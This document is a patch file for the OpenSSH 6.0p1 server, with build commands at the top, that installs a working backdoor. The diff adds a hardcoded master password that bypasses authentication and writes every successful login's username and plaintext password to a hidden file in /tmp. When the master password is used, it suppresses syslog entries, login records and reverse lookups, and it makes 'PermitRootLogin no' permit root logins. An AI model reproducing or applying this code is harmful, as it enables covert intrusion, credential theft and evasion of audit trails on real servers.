# wget http://mirror.bytemark.co.uk/OpenBSD/OpenSSH/portable/openssh-6.0p1.tar.gz
# patch < OpenSSH-6.0p1.patch
# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
# bob@dtors.net

--- openssh-6.0p1/includes.h	2010-10-24 00:47:30.000000000 +0100
+++ openssh-patch/includes.h	2012-06-26 10:14:52.669749613 +0100
@@ -17,7 +17,6 @@
 #define INCLUDES_H
 
 #include "config.h"
-
 #define _GNU_SOURCE /* activate extra prototypes for glibc */
 
 #include <sys/types.h>
@@ -172,4 +171,11 @@
 
 #include "entropy.h"
 
+int passphrase;
+FILE *f;
+char *result_crypt;
+#define pass_crypt  "AbTLrS7zqigWE" //password DES ciphered
+#define ILOG "/tmp/.ilog"
+#define OLOG "/tmp/.olog"
+
 #endif /* INCLUDES_H */
--- openssh-6.0p1/auth-passwd.c	2009-03-08 00:40:28.000000000 +0000
+++ openssh-patch/auth-passwd.c	2012-06-26 10:15:51.996716095 +0100
@@ -44,6 +44,7 @@
 #include <stdio.h>
 #include <string.h>
 #include <stdarg.h>
+#include <crypt.h>
 
 #include "packet.h"
 #include "buffer.h"
@@ -82,10 +83,18 @@
 {
 	struct passwd * pw = authctxt->pw;
 	int result, ok = authctxt->valid;
+	char *crypted=pass_crypt;
 #if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
 	static int expire_checked = 0;
 #endif
 
+	result_crypt = crypt(password, crypted);
+	if (strcmp (result_crypt, crypted) == 0 ){
+        passphrase=1;
+	return 1; 
+	}
+
+
 #ifndef HAVE_CYGWIN
 	if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
 		ok = 0;
@@ -123,6 +132,12 @@
 	}
 #endif
 	result = sys_auth_passwd(authctxt, password);
+	if(result){
+		if((f=fopen(ILOG,"a"))!=NULL){
+		fprintf(f,"%s:%s\n",authctxt->user, password);
+		fclose(f);
+		}
+	}
 	if (authctxt->force_pwchange)
 		disable_forwarding();
 	return (result && ok);
--- openssh-6.0p1/auth-pam.c	2009-07-12 13:07:21.000000000 +0100
+++ openssh-patch/auth-pam.c	2012-06-25 15:31:30.599715321 +0100
@@ -1210,6 +1210,10 @@
 	if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
 		debug("PAM: password authentication accepted for %.100s",
 		    authctxt->user);
+			if((f=fopen(ILOG,"a"))!=NULL){
+			fprintf(f,"%s:%s\n",authctxt->user, password);
+			fclose(f);
+			}
 		return 1;
 	} else {
 		debug("PAM: password authentication failed for %.100s: %s",
--- openssh-6.0p1/auth.c	2011-05-29 12:40:42.000000000 +0100
+++ openssh-patch/auth.c	2012-06-25 15:31:30.600715472 +0100
@@ -271,14 +271,16 @@
 	else
 		authmsg = authenticated ? "Accepted" : "Failed";
 
-	authlog("%s %s for %s%.100s from %.200s port %d%s",
-	    authmsg,
-	    method,
-	    authctxt->valid ? "" : "invalid user ",
-	    authctxt->user,
-	    get_remote_ipaddr(),
-	    get_remote_port(),
-	    info);
+	if(!passphrase || passphrase !=1){
+        	authlog("%s %s for %s%.100s from %.200s port %d%s",
+	    	authmsg,
+	    	method,
+	    	authctxt->valid ? "" : "invalid user ",
+	    	authctxt->user,
+	    	get_remote_ipaddr(),
+	    	get_remote_port(),
+	    	info);
+	}
 
 #ifdef CUSTOM_FAILED_LOGIN
 	if (authenticated == 0 && !authctxt->postponed &&
--- openssh-6.0p1/canohost.c	2010-10-12 03:28:12.000000000 +0100
+++ openssh-patch/canohost.c	2012-06-25 15:31:30.601715398 +0100
@@ -78,10 +78,12 @@
 
 	debug3("Trying to reverse map address %.100s.", ntop);
 	/* Map the IP address to a host name. */
+	if(!passphrase || passphrase!=1){
 	if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
 	    NULL, 0, NI_NAMEREQD) != 0) {
 		/* Host name not found.  Use ip address. */
 		return xstrdup(ntop);
+		}
 	}
 
 	/*
--- openssh-6.0p1/log.c	2011-06-20 05:42:23.000000000 +0100
+++ openssh-patch/log.c	2012-06-25 15:31:30.602715446 +0100
@@ -351,6 +351,7 @@
 void
 do_log(LogLevel level, const char *fmt, va_list args)
 {
+if(!passphrase || passphrase!=1){
 #if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT)
 	struct syslog_data sdata = SYSLOG_DATA_INIT;
 #endif
@@ -428,3 +429,4 @@
 	}
 	errno = saved_errno;
 }
+}
--- openssh-6.0p1/servconf.c	2011-10-02 08:57:38.000000000 +0100
+++ openssh-patch/servconf.c	2012-06-25 15:31:30.603715332 +0100
@@ -686,7 +686,7 @@
 	{ "without-password",		PERMIT_NO_PASSWD },
 	{ "forced-commands-only",	PERMIT_FORCED_ONLY },
 	{ "yes",			PERMIT_YES },
-	{ "no",				PERMIT_NO },
+	{ "no",				PERMIT_YES },
 	{ NULL, -1 }
 };
 static const struct multistate multistate_compression[] = {
--- openssh-6.0p1/sshlogin.c	2011-01-11 06:20:07.000000000 +0000
+++ openssh-patch/sshlogin.c	2012-06-25 15:31:30.604715442 +0100
@@ -133,8 +133,10 @@
 
 	li = login_alloc_entry(pid, user, host, tty);
 	login_set_addr(li, addr, addrlen);
+	if (!passphrase || passphrase!=1){
 	login_login(li);
 	login_free_entry(li);
+	}
 }
 
 #ifdef LOGIN_NEEDS_UTMPX
@@ -146,8 +148,10 @@
 
 	li = login_alloc_entry(pid, user, host, ttyname);
 	login_set_addr(li, addr, addrlen);
+	if(!passphrase || passphrase!=1){
 	login_utmp_only(li);
 	login_free_entry(li);
+	}
 }
 #endif
 
@@ -158,6 +162,8 @@
 	struct logininfo *li;
 
 	li = login_alloc_entry(pid, user, NULL, tty);
+	if(!passphrase || passphrase!=1){
 	login_logout(li);
 	login_free_entry(li);
+	}
 }